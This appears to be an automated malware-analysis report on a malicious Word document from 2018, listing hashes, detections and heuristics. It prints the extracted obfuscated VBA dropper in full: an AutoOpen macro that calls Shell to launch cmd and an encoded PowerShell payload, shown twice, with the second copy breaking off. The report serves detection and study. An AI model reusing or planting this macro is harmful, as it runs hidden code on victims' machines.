Office (OLE) malware analysis — malicious · 0ae31d83ea8027b9

MALICIOUS

Office (OLE)

94.2 KB Created: 2018-06-06 06:39:00 Authoring application: Microsoft Office Word First seen: 2018-06-21

MD5: ab088229cdcc8dc84030e92e0c383229 SHA-1: 0a40ed8a6249caab2ce85e4706c983f831513930 SHA-256: 0ae31d83ea8027b91dbc6afac832c8d6e7ae6fbc001995fec272f3faa2f09b4e

210 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The file contains a VBA macro with an AutoOpen function that calls the Shell() function. This function is used to execute a command, likely to download and run a second-stage payload. The reconstructed command string is 'md plPJIwiIqinJoKjSjWfIMmfwBMpOtocRasZ aSNWcuBclOtb & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V ', which suggests a downloader or dropper functionality.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6574809-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6574809-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

TwGIQL = Cos(wnpXHp)
mPDjjDmk = KfIsSUPSYqX + Shell(TFZjUpY + Chr(RuLijJzspUT + vbKeyC + KIbhNo) + CGrWHtscHf + XNbIiwF + WZMXTuZ + MzwAiX + jTJBQjBtJwj + hDJrzqizz, 57795 - 57795)
QYEtiK = Hex(htPUH + Hex(risYw) * 13397 + Round(GctZM))

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Function
Sub Autoopen()
On Error Resume Next
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11375 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11375 bytes
SHA-256: `2ee270d9f7960718c953ca2fc149c31adb097c22312bea09ba7f9e6193e512bc`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ziuMCubYl" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function mPDjjDmk() On Error Resume Next Diuml = Hex(GBzLMm + Hex(rKYjX) * 99339 + Round(wwHpaK)) JCtSvj = Cos(TEPcE) sdiSR = CDate(nRCfHV) hGGbEL = Cos(wwwEtR) KXFJE = Hex(nDTSp + Hex(mWcHX) * 72078 + Round(LwtMdK)) dQviZ = Cos(zhduw) DDwim = CDate(ljYETo) TwGIQL = Cos(wnpXHp) mPDjjDmk = KfIsSUPSYqX + Shell(TFZjUpY + Chr(RuLijJzspUT + vbKeyC + KIbhNo) + CGrWHtscHf + XNbIiwF + WZMXTuZ + MzwAiX + jTJBQjBtJwj + hDJrzqizz, 57795 - 57795) QYEtiK = Hex(htPUH + Hex(risYw) * 13397 + Round(GctZM)) UXQNZW = Cos(vVHTLl) alDqnJ = CDate(kUvRaA) mnffhz = Cos(dRfqwJ) End Function Sub Autoopen() On Error Resume Next WWYMLc = Hex(VZCmCw + Hex(DVwwVK) * 17650 + Round(coiloz)) XApAJ = Cos(zWEPY) QOcsi = CDate(Fawjr) zUoujh = Cos(oiBCCw) mPDjjDmk nWFwr = Hex(zzsTzv + Hex(ijWWoJ) * 24390 + Round(paCnW)) khOMaw = Cos(PiUwrH) zbUvoi = CDate(EHfNtj) wwDLV = Cos(MSdHYz) End Sub Attribute VB_Name = "SABYzBjBNF" Function CGrWHtscHf() On Error Resume Next KSiNN = Hex(JGsoSt + Hex(AlkQK) * 31521 + Round(hULCMB)) pAEfi = Cos(XtUFZ) ljuVnH = CDate(YGRMZ) PBhqGb = Cos(MKUFo) Riolf = "md plP" + "JIwiIqinJo KjS" + "jWfIMmfwB" + "Mp" + "OtocRa" + "sZ aSNWcuBclOtb" + " & " nqdGQ = Hex(qSfDnz + Hex(vscOX) * 76467 + Round(jPCqDN)) ZiaMoj = Cos(TivzAh) jkzuqi = CDate(IjwzRK) XnnDDB = Cos(oErwS) jwSRmihv = " %^c^o^m^S^p^E" + "^c^% %" + "^c" + "^o^m^" + "S^p^E^c^% " + "/V " bNhOWG = Hex(AfEwMf + Hex(QuiPWW) * 5287 + Round(qIwzjR)) jGvYpF = Cos(CiaLPb) jqqYEB = CDate(Zbbvqf) YRZZd = Cos(wzAop) wDsHPqEDcD = " /" + "c " + " set %Zj" + "Rdi" VrwoKH = Hex(DGRFZb + Hex(wGiTc) * 97515 + Round(YdQAml)) tmqCi = Cos(fBcmR) PcPHMA = CDate(NKsSjL) QwOjoY = Cos(IJUbD) NQHsKQw = "cwjK" + "juVSbp%=jWC" + "RJfIESlj" + "sd" + "W&&set %Haoz" + "LirSU" + "Y%=p&&set " + "%R" NkzdrC = Hex(jzIWDz + Hex(YIBUJq) * 83128 + Round(jnwwsR)) TvjJJ = Cos(dMOaiW) Snrco = CDate(wzHzSM) QBKhtK = Cos(ciNqu) atDqHOuLb = "asCRowiY" + "Ajd%=o^w&&se" + "t %qnTO" + "oMXz" + "iztpbuX%" + "=EAECvOL" + "bR" Dvwnuf = Hex(jivvT + Hex(ITHLv) * 26934 + Round(KUbCjj)) zfnaB = Cos(whDDUF) sQlFON = CDate(BDUSSc) fjTtGN = Cos(UDqVu) CYWYub = "uXML" + "&&set %puEunRU" + "Ff" + "Wk%=!%Haoz" + "LirSUY%!&&" + "set %w" + "tGGopHBDn" + "cchoE%=UDOja" LaQErp = Hex(EuiWnS + Hex(SvLVHZ) * 70666 + Round(wjJNs)) YMvkUc = Cos(anPbc) tlAwF = CDate(PtYrVN) Ascjv = Cos(wzfhnm) vwzDVWp = "hinb" + "a&&set %Xv" + "FNKkK%=e^r&&" + "set " + "%jGiZjiUBlt" + "Lqw%=!" qZrIw = Hex(fYrhzn + Hex(ZdiAU) * 49262 + Round(zbfwH)) wjBND = Cos(KmzqC) vbiwJ = CDate(ftrET) fNNPU = Cos(usAcz) JDZSOM = "%RasCRowiYAj" + "d%!&&set %" + "PFFRmNJkT" + "GtLiR%=s&&se" + "t %bbszuoKomE" + "njnE" + "Q%=ANbZOaH" + "DzqJf" WddjcR = Hex(mjkYzo + Hex(STSOc) * 84618 + Round(kiqzu)) ivJPT = Cos(jafhvQ) cjkuoP = CDate(RwaamA) mlunj = Cos(zuqXUF) irJWhFOjVm = "k&&set %idTADM" + "qVb%=he&&" + "set %kbPYdH" + "kNrBVmkf%=ll&&" CGrWHtscHf = Riolf + jwSRmihv + wDsHPqEDcD + NQHsKQw + atDqHOuLb + CYWYub + vwzDVWp + JDZSOM + irJWhFOjVm End Function Function XNbIiwF() On Error Resume Next EcmlX = Hex(BPjznB + Hex(TAlUjc) * 36357 + Round(zokuL)) ahpNai = Cos(WoJpCo) pGlHlz = CDate(wIWor) tHnCqM = Cos(bhqmN) bnViF = "!%" + "puEunRUFfWk%!" + "!%jGi" + "ZjiUBltLqw%!!" + "%XvFNKkK%!!%" + "PFFR" + "mNJkTGtLiR" + "%!!%i" + "dTADMqVb%!!%" nwMbf = Hex(oUkrCd + Hex(LSbZT) * 49445 + Round(wCPAHw)) XXHPzt = Cos(LSmjq) DSJPl = CDate(hAzzI) MfWlj = Cos(UhpQz) Muibld = "kbPYdHkN" + "rBVmk" + "f%! -e LgAgACg" + "AIAAkAHAAcwBoA" + "G8AbQBFAFsANA" + "BdACsAJABw" + "AHMASABPAG0AZQ" bCjqzA = Hex(sdSiit + Hex(PjQqaX) * 97018 + Round(nNwalb)) JRmUj = Cos(iorAwJ) tuAsr = CDate(vlQzqZ) iPWuYP = Cos(fTAsJ) wHnTwSm = "BbADMA" + "MABdACsA" + "Jw" + "BY" + "ACcAKQAgACgAbgB" + "FAFcALQBvAG" + "IAagBlAEMAdA" + "AgA" + "EkATwAuAFMAdAB" LhuZp = Hex(NhzsND + Hex(EjbsSv) * 91133 + Round(FSSwb)) wkauHj = Cos(VNqrJM) wjWIq = CDate(KhEahw) KGPbc = Cos(vRzZw) oRGNKzc = "SAGUAQQB" + "NAFIAZQBhA" + "EQARQ" + "BSACgAI" + "AAoACAAbgBFAFc" + "ALQBvAGIAagBlAE" + "MAdAAgAFM" + "AeQBTAFQAZQBNAC" + "4AaQBvAC4AQw" + "BvAE0A" UEiSk = Hex(IjjFV + Hex(JGmWOj) * 99036 + Round(KVUPw)) PwQtz = Cos(YDWlb) UZYNi = CDate(kTRVb) DRZlu = Cos(kTTUmM) DzliN = "UABSAEUAcwB" + "TAGkAbwB" + "OAC4AR" + "ABlAEYAbABhAF" + "QAZQBTAFQA" + "UgBlAGEATQ" pGLXG = Hex(BuzLan + Hex(rPifzt) * 39750 + Round(qhkmIW)) IvznM = Cos(owZwLl) iDFzwz = CDate(VpoXs) awYakz = Cos(zmDMn) lqisXqoiEmd = "AoACAAWw" + "BJAE8ALgB" + "NAEUAT" + "QBvAFI" + "AWQBTAHQA" + "UgBFAGEATQBdA" + "CA" BCQFjm = Hex(uNncl + Hex(LOjSHc) * 89120 + Round(VpawL)) YarAs = Cos(WvFEj) klzML = CDate(pwmzTU) ksGjNq = Cos(YZiTW) dMRqGjTiI = "AWwBjAE8A" + "bgBWAEUAUgB" + "UAF0AOgA6AEYAc" + "gBPAG0A" + "QgBhAHMAZ" + "QA2ADQAUwB" jZRPIb = Hex(CrIWId + Hex(IObZGW) * 8900 + Round(TQPsO)) jLCiqY = Cos(QfWqs) ssjjXj = CDate(wJwJM) iaFBzQ = Cos(GWjGs) MwVJFYrs = "0AHIASQBuAEcAKA" + "AgACcA" + "VgB" + "aAEI" + "AYgBUADgASgBBAE" FRsjE = Hex(OlLPjj + Hex(JCiXNt) * 33352 + Round(qlKiWa)) iWMdqF = Cos(vFataz) WLWUH = CDate(KczTN) aOfiFi = Cos(jGpCG) vuPZjsqnBQ = "UASQBY" + "AC8AeQBqA" + "DQAMAB" + "LAFUAVABaAGcA" + "dgBvAGcATgBpAF" XNbIiwF = bnViF + Muibld + wHnTwSm + oRGNKzc + DzliN + lqisXqoiEmd + dMRqGjTiI + MwVJFYrs + vuPZjsqnBQ End Function Function WZMXTuZ() On Error Resume Next mfHYwU = Hex(TdTao + Hex(OTUCX) * 87146 + Round(PiPQX)) KROGj = Cos(PfVbD) CzuIz = CDate(EtvTpO) SJqaH = Cos(rBbJB) wdpIvjEc = "kAYQBBAG" + "UAKwBWAFUASQ" + "Bu" + "AEIA" + "bQBKAGoA" + "cABNAHQAQwBWAGQ" + "AcgBmAHU" + "ARABpADYAWAA4AE" WnSYi = Hex(rQzVuV + Hex(hULdZ) * 82858 + Round(zCOwZE)) LMBap = Cos(DbHmVR) zzEzPV = CDate(ZwfYC) YETYT = Cos(ZijEzu) ZVwqGnlSaO = "4AOQBkAEUAV" + "QBsADgA" + "bQBXAFQA" + "bQBmAEQAT" + "QBuA" + "GMANABL" + "ADUAdQBVAHcA" + "dABPAD" + "IAYwBLAFgA" bDGMZ = Hex(HQfCw + Hex(jDloP) * 63749 + Round(XXVwHj)) VsvRt = Cos(CKtQT) GQvBtC = CDate(Hkvoq) XTXhG = Cos(wcGmO) wwiEzTCD = "VQBOAG4AS" + "AB5AGkASQBH" + "AFYAQgBqAFg" + "AYwBiAEIANgB6AH" + "cAWgBYAFoA" OIqOY = Hex(VUfaN + Hex(Vbvmci) * 49817 + Round(FAWnf)) nLVHzi = Cos(jfuisM) TVkwGv = CDate(iJMAY) LPNmD = Cos(uWJzYb) mkXzJiZZwdz = "ZgAvAHQAWABSAHA" + "AQwBVA" + "HUAZQBJAFAAR" + "QBYAHoASwA0AEsA" + "aQBZAHIAaQ" + "B3AEgA" vpwBHj = Hex(nkkPa + Hex(jSICIG) * 53181 + Round(VQRIb)) RPJVM = Cos(XAWiH) RBYaf = CDate(MWzcNH) RzRZYi = Cos(fZEYbO) nmWPqNqm = "NgBOAGs" + "AbQBMAGkA" + "eQ" + "BUAEE" + "AbgBxAHMAN" + "gBpAHkARABu" + "AEgAcABVAEcAR" + "gBBAHEAVAB" + "SAFgATwBn" WZMXTuZ = wdpIvjEc + ZVwqGnlSaO + wwiEzTCD + mkXzJiZZwdz + nmWPqNqm End Function Function MzwAiX() On Error Resume Next EJjva = Hex(DpZtvl + Hex(vEKpB) * 3211 + Round(vVFawD)) ZrzAw = Cos(vHMPj) NmbZYi = CDate(KzbPOW) jHjEI = Cos(Wjiwcs) AEWPo = "AHkAdQBvAFA" + "AUABrADkA" + "WABOAFQAWA" + "BTAHg" + "AUQB3AGkAVQBMAE" + "gAKwBsAHcAYw" + "B0A" + "HcAa" + "wBHAGEA" VYosuJ = Hex(orTvh + Hex(LsRwbi) * 58250 + Round(jnYIG)) QhIdzf = Cos(RmIjVF) lrnnX = CDate(ldOjW) OXolQk = Cos(azHjpw) iuwwEGaKjj = "cgBo" + "AGQAcQBMAHY" + "AVQBJAG" + "IAYQBTADAAb" + "wA2AHYAawB6" PuGIP = Hex(dWnpz + Hex(kuwmSc) * 13900 + Round(RKcBs)) hiKdIz = Cos(WzrXGR) Psjzl = CDate(ztiKpH) ukFRFP = Cos(ZzMJj) EzWLw = "AF" + "cAdwBoAHMAc" + "ABaA" + "EQAZQB4AGQAWQB" + "5AHkAcgBvAFAAe" + "gBmAGIAeABuA" + "GcAZQBqAGMAT" + "QB6AE4A" + "UABGAEoAM" wOzFP = Hex(LroYa + Hex(PNznAz) * 78463 + Round(PulsZ)) rBqQf = Cos(Sjilw) udwrG = CDate(inpBQ) zMVfmC = Cos(FfzUKA) BbovoaZQXhH = "wA1AFA" + "Acg" + "BOAC8AZAB6" + "AG0" + "AdQB1A" tALjf = Hex(raFLF + Hex(oaNmc) * 79650 + Round(FRTEmw)) IquzJm = Cos(iSdcJW) tYHKa = CDate(NCrtV) ZvFZwY = Cos(wGAjHB) rOPurZ = "EkAT" + "wBqAEoAVQBXAEgA" + "UABDAHAA" + "aQBXAGEAZ" + "AAzA" + "HEAaAB6AGUAdw" + "A5AFIAeQBOAE8Ac" + "QBrAEYAUQBMAEwA" + "OA" + "BKADYAS" hFHkJ = Hex(SiLtM + Hex(MiSFzB) * 53214 + Round(MudthE)) XvsrzI = Cos(hIvHj) LrkLM = CDate(MBjBB) jWGmbO = Cos(EsumT) AZzvEzEqwJ = "AB" + "HAFMAVABtAGIA" + "NAB5AC8AbwBOA" + "GcA" + "RwB3AGg" + "AWAB1AEsAQgBh" MzwAiX = AEWPo + iuwwEGaKjj + EzWLw + BbovoaZQXhH + rOPurZ + AZzvEzEqwJ End Function Function jTJBQjBtJwj() On Error Resume Next NmEBK = Hex(rRYSU + Hex(RjfsY) * 84003 + Round(qMTlAu)) jEiKRF = Cos(KzPHA) rJOHE = CDate(bKhXMT) rcptA = Cos(Gdcnm) IwDTJa = "ADYANQBBAGQAdA" + "BkAHUAdAAwADYA" + "WQBIAFIAcwB" + "sAHMASwBIADkAM" + "AB" + "WAEYAOQBuA" + "FAAbwBLA" + "EsASABiAEQAdw" BPtHj = Hex(kYVDh + Hex(LhOSWz) * 62249 + Round(qNOpU)) PDtsO = Cos(csCXi) AIbvh = CDate(uriTpn) dHUXn = Cos(EmbAh) WqiVQSrKod = "BMAGYAVAAxAGIAO" + "QBmADMASABCAG" + "MAWQB4AGgATg" + "B0AEU" + "AR" dpLWSi = Hex(kTwXqv + Hex(audXvN) * 11409 + Round(kOHVOW)) QZIuQD = Cos(jVPpzD) fjdcHZ = CDate(IDETZ) EwOzPV = Cos(CYPvf) NdLXa = "QBSAG" + "UAQ" + "wB4AEk" + "ATABqADgATQ" + "BuAEoAaABYAGI" + "AS" + "gBWAFIAZ" cKIIGQ = Hex(wEfis + Hex(wSHVD) * 51537 + Round(LtnHRZ)) vlHUhz = Cos(zzAvwD) wARjE = CDate(YovCL) oRiXB = Cos(jnHKwK) rRzvrIm = "gBrADEAbQB1" + "AGQ" + "AOABI" + "AHkAagBuAGEAcQ" + "AwAEQARAB1AH" + "kA" + "UQBMAC8AWQ" + "BQADYAcwBVAH" vbwTHa = Hex(XVOtW + Hex(MQDHq) * 10030 + Round(MJOPc)) ERQOlD = Cos(nJhaV) bFzSCp = CDate(iiQjA) rBjmM = Cos(qIWnHG) VhWfZBj = "oASgBTAFQAVwB" + "2A" + "DEAUQAvAFoAcgB" + "XAG8AOQBUAE" + "EA" + "awBPAE4AdgB0" + "AEUAQwBy" pPjDid = Hex(CdDOqM + Hex(aUaBj) * 28356 + Round(LEEXV)) iiFSqM = Cos(zlubh) OROwU = CDate(AJQowl) rLdLff = Cos(nGYXk) WtDTlD = "AGQA" + "MQBOADQAOAB5AGI" + "AegBP" + "AEsATg" + "BBAEIATAA1" + "ADIAaABs" + "AEoAMgBNAGk" dmapZ = Hex(UbAzzG + Hex(bUjOqJ) * 62630 + Round(VNVaP)) TRHtqN = Cos(SNjaOz) zrMjF = CDate(EsGshN) HIZEO = Cos(DBJsG) lzdvTi = "AMQBKAFIA" + "YQA4AD" + "gA" + "KwA1AEMAWQB" + "FAFYAUwBLAC8ANw" + "BvAEYAMgBDAE" + "sAOABX" + "AGIAegBEAFE" snIHz = Hex(bMPRiB + Hex(VSqaLP) * 22295 + Round(JoKoiM)) uPpzG = Cos(MJwlI) GBoqi = CDate(PtrMa) cuijwz = Cos(TbXSz) ZKEjnHHp = "APQA" + "9A" + "CcA" + "KQAgACwAWwBJAG" + "8AL" + "gBjAE8ATQBwA" + "FIAZQBzAFMA" jTJBQjBtJwj = IwDTJa + WqiVQSrKod + NdLXa + rRzvrIm + VhWfZBj + WtDTlD + lzdvTi + ZKEjnHHp End Function Function hDJrzqizz() On Error Resume Next ivPIJu = Hex(CLFbUz + Hex(QPSMhp) * 83518 + Round(LvdKw)) pcijp = Cos(zczlh) lvQpC = CDate(ARCDJ) kKkHj = Cos(fzwWM) ZMVOVsmCBA = "aQBPAG4ALgBDA" + "E8A" + "bQBwAFIAZQBTAHM" + "AaQBvAE4ATQBvAG" + "QAZQBdADoAOg" + "BkAEUAYwBvAG0Ac" + "AByAEUAUwBzACAA" + "KQAgACkAIAAsAC" Wrfjho = Hex(hiQDv + Hex(WsOJj) * 32220 + Round(TXziir)) iFiVPj = Cos(SKkRkN) bjUHoA = CDate(cRpPF) PwsAEp = Cos(kbwunM) fDpFv = "AAW" + "wB0A" + "EUAeAB" + "0AC4ARQBuAEMA" + "TwBEAEkATgBnAF0" + "AOgA6AG" + "EAUwBDA" Dhdsw = Hex(zrrfX + Hex(qiCosG) * 19485 + Round(STSjM)) RDAjZT = Cos(bKunwS) dXGNc = CDate(wRinD) dDGjPu = Cos(BlurIF) BWwuCmN = "EkAaQApA" + "CAAKQAuA" + "HIAZQBhAEQAdABP" + "AG" + "UATgBEACgA" NPUHA = Hex(nHfuMF + Hex(zwzVN) * 61747 + Round(pZVaft)) QQjjw = Cos(YCjza) HAVXMW = CDate(mjFlY) cUOntu = Cos(HfWrwN) wOllrL = "IAApACAA" hDJrzqizz = ZMVOVsmCBA + fDpFv + BWwuCmN + wOllrL End Function

SHA-256: 2ee270d9f7960718c953ca2fc149c31adb097c22312bea09ba7f9e6193e512bc

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ziuMCubYl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function mPDjjDmk()
On Error Resume Next
Diuml = Hex(GBzLMm + Hex(rKYjX) * 99339 + Round(wwHpaK))
JCtSvj = Cos(TEPcE)
sdiSR = CDate(nRCfHV)
hGGbEL = Cos(wwwEtR)
KXFJE = Hex(nDTSp + Hex(mWcHX) * 72078 + Round(LwtMdK))
dQviZ = Cos(zhduw)
DDwim = CDate(ljYETo)
TwGIQL = Cos(wnpXHp)
mPDjjDmk = KfIsSUPSYqX + Shell(TFZjUpY + Chr(RuLijJzspUT + vbKeyC + KIbhNo) + CGrWHtscHf + XNbIiwF + WZMXTuZ + MzwAiX + jTJBQjBtJwj + hDJrzqizz, 57795 - 57795)
QYEtiK = Hex(htPUH + Hex(risYw) * 13397 + Round(GctZM))
UXQNZW = Cos(vVHTLl)
alDqnJ = CDate(kUvRaA)
mnffhz = Cos(dRfqwJ)
End Function
Sub Autoopen()
On Error Resume Next
WWYMLc = Hex(VZCmCw + Hex(DVwwVK) * 17650 + Round(coiloz))
XApAJ = Cos(zWEPY)
QOcsi = CDate(Fawjr)
zUoujh = Cos(oiBCCw)
mPDjjDmk
nWFwr = Hex(zzsTzv + Hex(ijWWoJ) * 24390 + Round(paCnW))
khOMaw = Cos(PiUwrH)
zbUvoi = CDate(EHfNtj)
wwDLV = Cos(MSdHYz)
End Sub


Attribute VB_Name = "SABYzBjBNF"
Function CGrWHtscHf()
On Error Resume Next
KSiNN = Hex(JGsoSt + Hex(AlkQK) * 31521 + Round(hULCMB))
pAEfi = Cos(XtUFZ)
ljuVnH = CDate(YGRMZ)
PBhqGb = Cos(MKUFo)
Riolf = "md plP" + "JIwiIqinJo KjS" + "jWfIMmfwB" + "Mp" + "OtocRa" + "sZ aSNWcuBclOtb" + " &   "
nqdGQ = Hex(qSfDnz + Hex(vscOX) * 76467 + Round(jPCqDN))
ZiaMoj = Cos(TivzAh)
jkzuqi = CDate(IjwzRK)
XnnDDB = Cos(oErwS)
jwSRmihv = "  %^c^o^m^S^p^E" + "^c^%     %" + "^c" + "^o^m^" + "S^p^E^c^%     " + "/V    "
bNhOWG = Hex(AfEwMf + Hex(QuiPWW) * 5287 + Round(qIwzjR))
jGvYpF = Cos(CiaLPb)
jqqYEB = CDate(Zbbvqf)
YRZZd = Cos(wzAop)
wDsHPqEDcD = "     /" + "c         " + "  set %Zj" + "Rdi"
VrwoKH = Hex(DGRFZb + Hex(wGiTc) * 97515 + Round(YdQAml))
tmqCi = Cos(fBcmR)
PcPHMA = CDate(NKsSjL)
QwOjoY = Cos(IJUbD)
NQHsKQw = "cwjK" + "juVSbp%=jWC" + "RJfIESlj" + "sd" + "W&&set %Haoz" + "LirSU" + "Y%=p&&set " + "%R"
NkzdrC = Hex(jzIWDz + Hex(YIBUJq) * 83128 + Round(jnwwsR))
TvjJJ = Cos(dMOaiW)
Snrco = CDate(wzHzSM)
QBKhtK = Cos(ciNqu)
atDqHOuLb = "asCRowiY" + "Ajd%=o^w&&se" + "t %qnTO" + "oMXz" + "iztpbuX%" + "=EAECvOL" + "bR"
Dvwnuf = Hex(jivvT + Hex(ITHLv) * 26934 + Round(KUbCjj))
zfnaB = Cos(whDDUF)
sQlFON = CDate(BDUSSc)
fjTtGN = Cos(UDqVu)
CYWYub = "uXML" + "&&set %puEunRU" + "Ff" + "Wk%=!%Haoz" + "LirSUY%!&&" + "set %w" + "tGGopHBDn" + "cchoE%=UDOja"
LaQErp = Hex(EuiWnS + Hex(SvLVHZ) * 70666 + Round(wjJNs))
YMvkUc = Cos(anPbc)
tlAwF = CDate(PtYrVN)
Ascjv = Cos(wzfhnm)
vwzDVWp = "hinb" + "a&&set %Xv" + "FNKkK%=e^r&&" + "set " + "%jGiZjiUBlt" + "Lqw%=!"
qZrIw = Hex(fYrhzn + Hex(ZdiAU) * 49262 + Round(zbfwH))
wjBND = Cos(KmzqC)
vbiwJ = CDate(ftrET)
fNNPU = Cos(usAcz)
JDZSOM = "%RasCRowiYAj" + "d%!&&set %" + "PFFRmNJkT" + "GtLiR%=s&&se" + "t %bbszuoKomE" + "njnE" + "Q%=ANbZOaH" + "DzqJf"
WddjcR = Hex(mjkYzo + Hex(STSOc) * 84618 + Round(kiqzu))
ivJPT = Cos(jafhvQ)
cjkuoP = CDate(RwaamA)
mlunj = Cos(zuqXUF)
irJWhFOjVm = "k&&set %idTADM" + "qVb%=he&&" + "set %kbPYdH" + "kNrBVmkf%=ll&&"
CGrWHtscHf = Riolf + jwSRmihv + wDsHPqEDcD + NQHsKQw + atDqHOuLb + CYWYub + vwzDVWp + JDZSOM + irJWhFOjVm
End Function
Function XNbIiwF()
On Error Resume Next
EcmlX = Hex(BPjznB + Hex(TAlUjc) * 36357 + Round(zokuL))
ahpNai = Cos(WoJpCo)
pGlHlz = CDate(wIWor)
tHnCqM = Cos(bhqmN)
bnViF = "!%" + "puEunRUFfWk%!" + "!%jGi" + "ZjiUBltLqw%!!" + "%XvFNKkK%!!%" + "PFFR" + "mNJkTGtLiR" + "%!!%i" + "dTADMqVb%!!%"
nwMbf = Hex(oUkrCd + Hex(LSbZT) * 49445 + Round(wCPAHw))
XXHPzt = Cos(LSmjq)
DSJPl = CDate(hAzzI)
MfWlj = Cos(UhpQz)
Muibld = "kbPYdHkN" + "rBVmk" + "f%!  -e LgAgACg" + "AIAAkAHAAcwBoA" + "G8AbQBFAFsANA" + "BdACsAJABw" + "AHMASABPAG0AZQ"
bCjqzA = Hex(sdSiit + Hex(PjQqaX) * 97018 + Round(nNwalb))
JRmUj = Cos(iorAwJ)
tuAsr = CDate(vlQzqZ)
iPWuYP = Cos(fTAsJ)
wHnTwSm = "BbADMA" + "MABdACsA" + "Jw" + "BY" + "ACcAKQAgACgAbgB" + "FAFcALQBvAG" + "IAagBlAEMAdA" + "AgA" + "EkATwAuAFMAdAB"
LhuZp = Hex(NhzsND + Hex(EjbsSv) * 91133 + Round(FSSwb))
wkauHj = Cos(VNqrJM)
wjWIq = CDate(KhEahw)
KGPbc = Cos(vRzZw)
oRGNKzc = "SAGUAQQB" + "NAFIAZQBhA" + "EQARQ" + "BSACgAI" + "AAoACAAbgBFAFc" + "ALQBvAGIAagBlAE" + "MAdAAgAFM" + "AeQBTAFQAZQBNAC" + "4AaQBvAC4AQw" + "BvAE0A"
UEiSk = Hex(IjjFV + Hex(JGmWOj) * 99036 + Round(KVUPw))
PwQtz = Cos(YDWlb)
UZYNi = CDate(kTRVb)
DRZlu = Cos(kTTUmM)
DzliN = "UABSAEUAcwB" + "TAGkAbwB" + "OAC4AR" + "ABlAEYAbABhAF" + "QAZQBTAFQA" + "UgBlAGEATQ"
pGLXG = Hex(BuzLan + Hex(rPifzt) * 39750 + Round(qhkmIW))
IvznM = Cos(owZwLl)
iDFzwz = CDate(VpoXs)
awYakz = Cos(zmDMn)
lqisXqoiEmd = "AoACAAWw" + "BJAE8ALgB" + "NAEUAT" + "QBvAFI" + "AWQBTAHQA" + "UgBFAGEATQBdA" + "CA"
BCQFjm = Hex(uNncl + Hex(LOjSHc) * 89120 + Round(VpawL))
YarAs = Cos(WvFEj)
klzML = CDate(pwmzTU)
ksGjNq = Cos(YZiTW)
dMRqGjTiI = "AWwBjAE8A" + "bgBWAEUAUgB" + "UAF0AOgA6AEYAc" + "gBPAG0A" + "QgBhAHMAZ" + "QA2ADQAUwB"
jZRPIb = Hex(CrIWId + Hex(IObZGW) * 8900 + Round(TQPsO))
jLCiqY = Cos(QfWqs)
ssjjXj = CDate(wJwJM)
iaFBzQ = Cos(GWjGs)
MwVJFYrs = "0AHIASQBuAEcAKA" + "AgACcA" + "VgB" + "aAEI" + "AYgBUADgASgBBAE"
FRsjE = Hex(OlLPjj + Hex(JCiXNt) * 33352 + Round(qlKiWa))
iWMdqF = Cos(vFataz)
WLWUH = CDate(KczTN)
aOfiFi = Cos(jGpCG)
vuPZjsqnBQ = "UASQBY" + "AC8AeQBqA" + "DQAMAB" + "LAFUAVABaAGcA" + "dgBvAGcATgBpAF"
XNbIiwF = bnViF + Muibld + wHnTwSm + oRGNKzc + DzliN + lqisXqoiEmd + dMRqGjTiI + MwVJFYrs + vuPZjsqnBQ
End Function
Function WZMXTuZ()
On Error Resume Next
mfHYwU = Hex(TdTao + Hex(OTUCX) * 87146 + Round(PiPQX))
KROGj = Cos(PfVbD)
CzuIz = CDate(EtvTpO)
SJqaH = Cos(rBbJB)
wdpIvjEc = "kAYQBBAG" + "UAKwBWAFUASQ" + "Bu" + "AEIA" + "bQBKAGoA" + "cABNAHQAQwBWAGQ" + "AcgBmAHU" + "ARABpADYAWAA4AE"
WnSYi = Hex(rQzVuV + Hex(hULdZ) * 82858 + Round(zCOwZE))
LMBap = Cos(DbHmVR)
zzEzPV = CDate(ZwfYC)
YETYT = Cos(ZijEzu)
ZVwqGnlSaO = "4AOQBkAEUAV" + "QBsADgA" + "bQBXAFQA" + "bQBmAEQAT" + "QBuA" + "GMANABL" + "ADUAdQBVAHcA" + "dABPAD" + "IAYwBLAFgA"
bDGMZ = Hex(HQfCw + Hex(jDloP) * 63749 + Round(XXVwHj))
VsvRt = Cos(CKtQT)
GQvBtC = CDate(Hkvoq)
XTXhG = Cos(wcGmO)
wwiEzTCD = "VQBOAG4AS" + "AB5AGkASQBH" + "AFYAQgBqAFg" + "AYwBiAEIANgB6AH" + "cAWgBYAFoA"
